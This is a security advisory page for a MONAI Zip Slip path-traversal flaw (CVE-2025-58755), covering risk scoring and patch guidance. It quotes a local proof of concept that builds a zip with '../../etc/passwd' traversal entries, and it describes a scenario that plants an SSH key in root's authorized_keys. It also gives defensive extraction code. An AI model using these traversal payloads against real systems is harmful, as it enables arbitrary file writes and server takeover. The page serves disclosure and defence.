CVE-2025-58755: MONAI: path traversal allows arbitrary file write

GHSA-x6ww-pf9m-m73m HIGH PoC AVAILABLE
Published September 9, 2025
CISO Take

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Risk Assessment

High risk for AI/ML teams using MONAI bundle downloads. CVSS 8.8 with network vector, low complexity, and low privileges required. Attack surface is broad: MONAI is prevalent in medical imaging AI pipelines and researchers routinely pull bundles from community sources like HuggingFace, GitHub, and MONAI Hub. An attacker who can host a ZIP (or MITM a download) achieves arbitrary file write without meaningful user interaction beyond the normal bundle workflow. Containerized training environments frequently run as root, amplifying impact.

Affected Systems

Package: monai
Ecosystem: pip
Vulnerable Range: <= 1.5.0
Patched: 1.5.1

Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 32% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

Recommended Action

5 steps

  1. PATCH

    Upgrade to monai >= 1.5.1 immediately (pip install --upgrade monai).

  2. AUDIT

    Run pip freeze | grep monai across all ML training and inference systems.

  3. DETECT

    Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations.

  4. WORKAROUND (if immediate patch is blocked)

    Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download.

  5. HARDEN

    Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.6.1.4 - AI supply chain management
NIST AI RMF
MANAGE 2.2 - Prioritize and apply risk treatments for AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58755?

MONAI bundle downloads are vulnerable to Zip Slip — a malicious ZIP hosted anywhere online can overwrite system files on ML workstations or training servers when extracted. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Is CVE-2025-58755 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58755, increasing the risk of exploitation.

How to fix CVE-2025-58755?

1. PATCH: Upgrade to monai >= 1.5.1 immediately (`pip install --upgrade monai`).
2. AUDIT: Run `pip freeze | grep monai` across all ML training and inference systems.
3. DETECT: Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations.
4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download.
5. HARDEN: Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What systems are affected by CVE-2025-58755?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI pipelines.

What is the CVSS score for CVE-2025-58755?

CVE-2025-58755 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.13%.

Technical Details

NVD Description

### Summary

The extractall function `zip_file.extractall(output_dir)` is used directly to process compressed files. It is used in many places in the project. When a Zip file containing malicious content is decompressed, it will overwrite system files. In addition, the project allows the download of the zip content through a link, which increases the scope of exploitation of this vulnerability.

When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd
  adding: malicious.txt (stored 0%)
  adding: ../../../../../../etc/passwd (deflated 64%)
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls
malicious.zip  p1.py  p2.py  r1.py  test_bundle
```

Then start the http service through python:

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')"
2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---
2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle'
2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract'
2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting'
2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip'
2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_'
2025-08-11 20:49:01,668 - INFO - > progress: True
2025-08-11 20:49:01,668 - INFO - ---
test_bundle.zip: 8.00kB [00:00, 204kB/s]
2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip
2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.
2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.
2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /
autodl-pub  cuda-keyring_1.0-1_all.deb  home  lib32   **malicious.txt**  opt   run   sys  var
bin         dev                         init  lib64   media              proc  sbin  tmp
boot        etc                         lib   libx32  mnt                root  srv   usr
```

We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file. If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.

### Impact

Arbitrary file write

### Repair Suggestions

Check the contents of the downloaded Zip file, or use a safer method to load it.
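The description above names the bare `zip_file.extractall(output_dir)` call as the root cause and suggests checking the archive contents or loading it more safely. The following is an added example (not MONAI's code) of what that hardening looks like: a pre-extraction check that lists traversal entries in a downloaded bundle, and a drop-in replacement for the extractall call that refuses the whole archive if any entry would resolve outside the target directory. The bundle archives it builds are constructed for the example.

```python
import os
import tempfile
import zipfile


def traversal_entries(zip_path):
    """Entry names that would land outside the extraction directory (absolute
    names, or names whose first component is '..'). Run before extracting."""
    bad = []
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            norm = os.path.normpath(name.replace("\\", "/"))
            if os.path.isabs(norm) or norm.split(os.sep)[0] == "..":
                bad.append(name)
    return bad


def safe_extractall(zip_path, output_dir):
    """Hardened stand-in for the bare zip_file.extractall(output_dir) call:
    every resolved destination must stay under output_dir, or the whole
    archive is rejected before a single file is written."""
    root = os.path.realpath(output_dir)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            dest = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, dest]) != root:
                raise ValueError(f"rejected traversal entry: {info.filename!r}")
        zf.extractall(root)
    return sorted(os.listdir(root))


def demo():
    """Build two constructed bundles, one clean and one carrying a traversal
    entry like the advisory's PoC, and show how each is handled."""
    tmp = tempfile.mkdtemp()
    bad_zip, clean_zip = os.path.join(tmp, "bad.zip"), os.path.join(tmp, "clean.zip")
    with zipfile.ZipFile(bad_zip, "w") as zf:
        zf.writestr("test_bundle/configs/metadata.json", "{}")
        zf.writestr("../../escaped.txt", "must never be written")  # Zip Slip entry
    with zipfile.ZipFile(clean_zip, "w") as zf:
        zf.writestr("test_bundle/configs/metadata.json", "{}")
    try:
        safe_extractall(bad_zip, os.path.join(tmp, "out"))
        rejected = False
    except ValueError:
        rejected = True
    extracted = safe_extractall(clean_zip, os.path.join(tmp, "out2"))
    return traversal_entries(bad_zip), rejected, extracted
```

Rejecting the archive outright, rather than silently relocating suspicious entries, also gives the DETECT step above a clean signal: a bundle that trips this check is worth an incident ticket, not a retry.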

Exploitation Scenario

Attacker uploads a crafted ZIP to HuggingFace, a research Slack channel, or a community forum frequented by medical AI teams. The ZIP contains an entry with a traversal path (e.g., `../../../../../root/.ssh/authorized_keys`) populated with the attacker's public key. An ML engineer follows a tutorial or colleague recommendation and runs `monai.bundle.scripts.download(url='<attacker-url>', bundle_dir='/tmp/model')`. MONAI downloads and calls `extractall()` without path sanitization, writing the attacker's key into root's authorized_keys. The attacker gains SSH access to a GPU training server, potentially with access to patient imaging datasets and downstream clinical AI model artifacts.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
September 9, 2025
Last Modified
September 26, 2025
First Seen
March 24, 2026
